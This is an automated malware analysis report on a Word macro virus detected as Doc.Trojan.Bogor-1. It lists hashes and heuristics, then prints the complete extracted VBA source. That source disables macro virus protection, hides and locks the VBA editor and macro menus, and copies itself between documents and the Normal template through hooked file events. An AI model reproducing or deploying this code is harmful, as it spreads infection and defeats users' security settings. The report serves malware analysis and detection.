Doc.Trojan.Bogor-1 Office (OLE) malware analysis — malicious · b52b0aee5a283f08

MALICIOUS

Office (OLE)

47.0 KB Created: 1999-10-22 06:25:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-20

MD5: 267dcdc055945bdc39c05d230aa90880 SHA-1: cb2528efcad343477450443f0453b4560ab5586d SHA-256: b52b0aee5a283f083d764511c03e21074a0a0aaf2e7948cdb035018315965b32

248 Risk Score

Malware Insights

Doc.Trojan.Bogor-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits critical heuristic firings for VBA macro virus replication and AV tampering, along with legacy WordBasic markers. The extracted VBA script, named 'IPBBogor', contains subroutines like 'CyInit' which explicitly disables macro security features and attempts to manipulate the VBA project code. This strongly suggests a malicious macro designed to execute arbitrary code and potentially spread.

Heuristics 5

ClamAV: Doc.Trojan.Bogor-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bogor-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
      Application.OrganizerCopy Source:=AD.FullName, _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7745 bytes
SHA-256: `ae5b2a3a391d1592ef2799a78b7a1de6a26c693805e2ea438715e9ce09126685`
Detection ClamAV: Doc.Trojan.Bogor-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "IPBBogor" Public AlAsal Public DokSave Public Norok Public Dokok Sub CyInit() Attribute CyInit.VB_Description = "Bogor Agriculture University" Attribute CyInit.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyInit" AlAsal = Application.DisplayAlerts Application.DisplayAlerts = wdAlertsNone Call Tahan WordBasic.DisableAutoMacros 0 CommandBars("Visual Basic").Visible = False CommandBars("Visual Basic").Enabled = False CommandBars("Visual Basic").Protection = msoBarNoChangeVisible CommandBars("Visual Basic").Protection = msoBarNoCustomize On Error Resume Next CommandBars("Tools").Controls("Macro").Delete CustomizationContext = NormalTemplate FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable On Error GoTo 0 End Sub Sub CyClose() Attribute CyClose.VB_Description = "Bogor Agriculture University" Attribute CyClose.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyClose" Application.DisplayAlerts = AlAsal End Sub Sub Dok2Nor() Attribute Dok2Nor.VB_Description = "Bogor Agriculture University" Attribute Dok2Nor.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Dok2Nor" Call Tahan On Error GoTo Erw1 Norok = False Set AD = ActiveDocument Set NT = NormalTemplate On Error GoTo Erh1a For i = 1 To NT.VBProject.VBComponents.Count NMacr = NT.VBProject.VBComponents(i).Name If NMacr = "IPBBogor" Then Norok = True If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") Then Application.OrganizerDelete Source:=NT.FullName, _ Name:=NMacr, Object:=wdOrganizerObjectProjectItems End If Next i Erh1a: If Norok = False Then On Error GoTo Erh1 Application.OrganizerCopy Source:=AD.FullName, _ Destination:=NT.FullName, Name:= _ "IPBBogor", Object:=wdOrganizerObjectProjectItems Templates(NT.FullName).Save Erh1: End If Erw1: End Sub Sub Nor2Dok() Attribute Nor2Dok.VB_Description = "Bogor Agriculture University" Attribute Nor2Dok.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Nor2Dok" On Error GoTo Erw2 DokSave = 0 Dokok = False Set AD = ActiveDocument Set NT = NormalTemplate On Error GoTo Erh2a For i = 1 To AD.VBProject.VBComponents.Count NMacr = AD.VBProject.VBComponents(i).Name If NMacr = "IPBBogor" Then Dokok = True NMacr = NT.VBProject.VBComponents(i).Name If NMacr = "IPBBogor" Then Dokok = True If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then Application.OrganizerDelete Source:=AD.FullName, _ Name:=NMacr, Object:=wdOrganizerObjectProjectItems End If Next i Erh2a: If Dokok = False Then On Error GoTo Erh2 Application.OrganizerCopy Source:=NT.FullName, _ Destination:=AD.FullName, Name:= _ "IPBBogor", Object:=wdOrganizerObjectProjectItems DokSave = 1 Erh2: End If Erw2: End Sub Sub Cyber() Attribute Cyber.VB_Description = "Bogor Agriculture University" Attribute Cyber.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Cyber" Call CyInit Call Dok2Nor Call CyClose End Sub Sub Tahan() Attribute Tahan.VB_Description = "Bogor Agriculture University" Attribute Tahan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Tahan" With Options .VirusProtection = False .SaveNormalPrompt = False End With End Sub Sub Simpan() Attribute Simpan.VB_Description = "Bogor Agriculture University" Attribute Simpan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Simpan" On Error GoTo Erh4 Set AD = ActiveDocument If DokSave = 1 Then AD.SaveAs FileName:=AD.Name, FileFormat:=wdFormatDocument End If Erh4: End Sub Sub AutoOpen() Attribute AutoOpen.VB_Description = "Bogor Agriculture University" Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.AutoOpen" Call Cyber End Sub Sub FileClose() Attribute FileClose.VB_Description = "Bogor Agriculture University" Attribute FileClose.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileClose" Call CyInit Call Dok2Nor Call Nor2Dok Call CyClose WordBasic.FileClose End Sub Sub FileOpen() Attribute FileOpen.VB_Description = "Bogor Agriculture University" Attribute FileOpen.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileOpen" Call Cyber Dialogs(wdDialogFileOpen).Show Call CyInit Call Nor2Dok Call Simpan Call CyClose End Sub Sub FileSaveAs() Attribute FileSaveAs.VB_Description = "Bogor Agriculture University" Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileSaveAs" Call CyInit Call Dok2Nor Call Nor2Dok Call CyClose Dialogs(wdDialogFileSaveAs).Show End Sub Sub FileSave() Attribute FileSave.VB_Description = "Bogor Agriculture University" Attribute FileSave.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileSave" Call CyInit Call Dok2Nor Call Nor2Dok Call CyClose On Error GoTo Errh1 If ActiveDocument.Saved = False Then ActiveDocument.Save Errh1: End Sub Sub HelpAbout() Attribute HelpAbout.VB_Description = "Bogor Agriculture University" Attribute HelpAbout.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.HelpAbout" On Error GoTo Erw3 MsgBox "Reformasi, YES!", 48 Help wdHelpAbout Erw3: End Sub Sub FileExit() Attribute FileExit.VB_Description = "Bogor Agriculture University" Attribute FileExit.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileExit" Call CyInit Call Dok2Nor Call Nor2Dok On Error GoTo Erw4 Erw4: Call CyClose WordBasic.FileExit End Sub Sub ToolsOptions() Attribute ToolsOptions.VB_Description = "Bogor Agriculture University" Attribute ToolsOptions.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsOptions" Dialogs(wdDialogToolsOptions).Show Call Cyber End Sub Sub FileNew() Attribute FileNew.VB_Description = "Bogor Agriculture University" Attribute FileNew.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileNew" Call Cyber Dialogs(wdDialogFileNew).Show End Sub Sub FileTemplates() Attribute FileTemplates.VB_Description = "Bogor Agriculture University" Attribute FileTemplates.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileTemplates" Call Cyber End Sub Sub ToolsMacro() Attribute ToolsMacro.VB_Description = "Bogor Agriculture University" Attribute ToolsMacro.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsMacro" Call Cyber End Sub Sub ToolsCustomize() Attribute ToolsCustomize.VB_Description = "Bogor Agriculture University" Attribute ToolsCustomize.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsCustomize" Call Cyber End Sub Sub ToolsCustomizeKeyboard() Attribute ToolsCustomizeKeyboard.VB_Description = "Bogor Agriculture University" Attribute ToolsCustomizeKeyboard.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsCustomizeKeyboard" Call Cyber End Sub Sub ViewVBCode() Attribute ViewVBCode.VB_Description = "Bogor Agriculture University" Attribute ViewVBCode.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ViewVBCode" Call Cyber End Sub Sub Organizer() Attribute Organizer.VB_Description = "Bogor Agriculture University" Attribute Organizer.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Organizer" End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.